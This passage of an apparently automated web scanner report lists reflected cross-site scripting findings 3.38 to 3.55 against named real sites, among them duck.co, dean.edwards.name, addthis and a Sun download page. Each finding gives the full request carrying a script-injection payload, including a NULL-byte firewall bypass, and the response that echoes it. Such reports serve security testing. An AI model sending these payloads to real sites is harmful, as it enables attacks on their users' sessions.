Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http:33b85<img src=a onerror=alert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:6013
...[SNIP]...

3.38. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:20 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com37922<img src=a onerror=alert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:6
...[SNIP]...

3.39. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cds.sun.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1 HTTP/1.1
Host: cds.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:33 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 20208
Set-Cookie: sid=prDf2DxIwjnf2nEhKhFWJizn0QNA097gYG49cPqWI_fU2HjsA00=; path=/
Set-Cookie: pgid=yYdgaHqkkjVSR0EUPIQsoQ3D0000f9cuKriS; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo
...[SNIP]...
elimiter="&" parametername="goto" currenturl="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1&ProductUUID=pGqJ_hCwj_AAAAEtB8oADqmS&ProductID=pGqJ_hCwj_AAAAEtB8oADqmS&Origin=ViewProductDetail-Start" -->
...[SNIP]...

3.40. https://client.trafficshaping.com/signin [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /signin

Request

GET /signin?email=1b192"><script>alert(1)</script>32cca89645832eced&password=&action=login HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: http://trafficshaping.com/
Cache-Control: max-age=0
Origin: http://trafficshaping.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:44:47 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4659

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - Sign into Your Account</title>
<meta name="description" conten
...[SNIP]...
<input type="text" size="30" name="email" value="1b192"><script>alert(1)</script>32cca89645832eced" />
...[SNIP]...

3.41. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>271d7883f11/">weblog%0070e78<a>271d7883f11</a>
...[SNIP]...

3.42. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/">
...[SNIP]...

3.43. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Request

GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:20:17 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/fasterc01ec<a>2a3ca83c34f</h1>
...[SNIP]...

3.44. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:49 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/">
...[SNIP]...

3.45. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:50 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>784e947c10e/">weblog%00fa627<a>784e947c10e</a>
...[SNIP]...

3.46. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Request

GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:21:27 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:21:28 GMT
Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/againf526a<a>bc4d18aee79/</h1>
...[SNIP]...

3.47. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Request

GET /weblog/2006/06/again/?d8539"><script>alert(1)</script>90e6230aa36=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 26 Feb 2011 23:20:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 214711

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?d8539\"><script>alert(1)</script>90e6230aa36=1#preview" method="post">
...[SNIP]...

3.48. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.capgemini.com/p.json

Request

GET /red/psi/sites/www.capgemini.com/p.json?callback=_ate.ad.hpre135a<script>alert(1)</script>61e83256a55&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.capgemini.com%2Fmy-capgemini%2F&1ku1seo HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298824784.60|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 28 Feb 2011 17:51:50 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 30 Mar 2011 17:51:50 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915510.60|1297806627.66; Domain=.addthis.com; Expires=Wed, 27-Feb-2013 02:56:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 28 Feb 2011 17:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 17:51:50 GMT
Connection: close

_ate.ad.hpre135a<script>alert(1)</script>61e83256a55({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.capgemini.com%2fmy-capgemini%2f"],"segments" : ["60"],"loc": "MjAwMD
...[SNIP]...

3.49. http://ds.addthis.com/red/psi/sites/www.virtusa.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.virtusa.com/p.json

Request

GET /red/psi/sites/www.virtusa.com/p.json?callback=_ate.ad.hprf3a3a<script>alert(1)</script>5c36cbdaef9&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fsoftware-testing%2Ftools-expertise.asp&ref=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fsoftware-testing%2F&1t0xsuh HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915503.60|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Mar 2011 13:41:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 31 Mar 2011 13:41:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Mar 2011 13:41:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Mar 2011 13:41:52 GMT
Connection: close

_ate.ad.hprf3a3a<script>alert(1)</script>5c36cbdaef9({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.50. http://duck.co/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /

Request

GET /?b0edc"><script>alert(1)</script>49b41fe65db=1 HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/spread.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=3eff0436-e0c8-4bca-b5d7-dc80dafe3590; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3BEEEE0BE7AEE10B833AC8A19B4BA1EC; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:01:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 270121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?b0edc"><script>alert(1)</script>49b41fe65db=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.51. http://duck.co/duckduckgo-forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /duckduckgo-forum

Request

GET /duckduckgo-forum?5c136"><script>alert(1)</script>d22917858db=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DEA1960F4771D42D380364871BE96CA1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:53:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/duckduckgo-forum?5c136"><script>alert(1)</script>d22917858db=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.52. http://duck.co/topic/2-25-news-stories-to-comment-on [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-25-news-stories-to-comment-on

Request

GET /topic/2-25-news-stories-to-comment-on?cc421"><script>alert(1)</script>15f241c5f6a=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BC90837E51136DF41D2E5C1A36DD2259; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/2-25-news-stories-to-comment-on?cc421"><script>alert(1)</script>15f241c5f6a=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.53. http://duck.co/topic/2-28-articles-to-comment-on [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-28-articles-to-comment-on

Request

GET /topic/2-28-articles-to-comment-on?9ad6f"><script>alert(1)</script>0f0fc7d6575=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=430E01D27D1C973AA7A041E72EDB07C7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/2-28-articles-to-comment-on?9ad6f"><script>alert(1)</script>0f0fc7d6575=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.54. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/about-com-s-web-search-readers-choice-awards

Request

GET /topic/about-com-s-web-search-readers-choice-awards?fddd6"><script>alert(1)</script>782b813e6b4=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9BD8EB052DDCDE7845B318C64EAF0E3A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:03 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/about-com-s-web-search-readers-choice-awards?fddd6"><script>alert(1)</script>782b813e6b4=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.55. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/boolean-operators-and-parentheses-for-search-query

Request

GET /topic/boolean-operators-and-parentheses-for-search-query?5356a"><script>alert(1)</script>3a5218a9e5f=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9951A7995503FF626EF94A3BB14226DF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
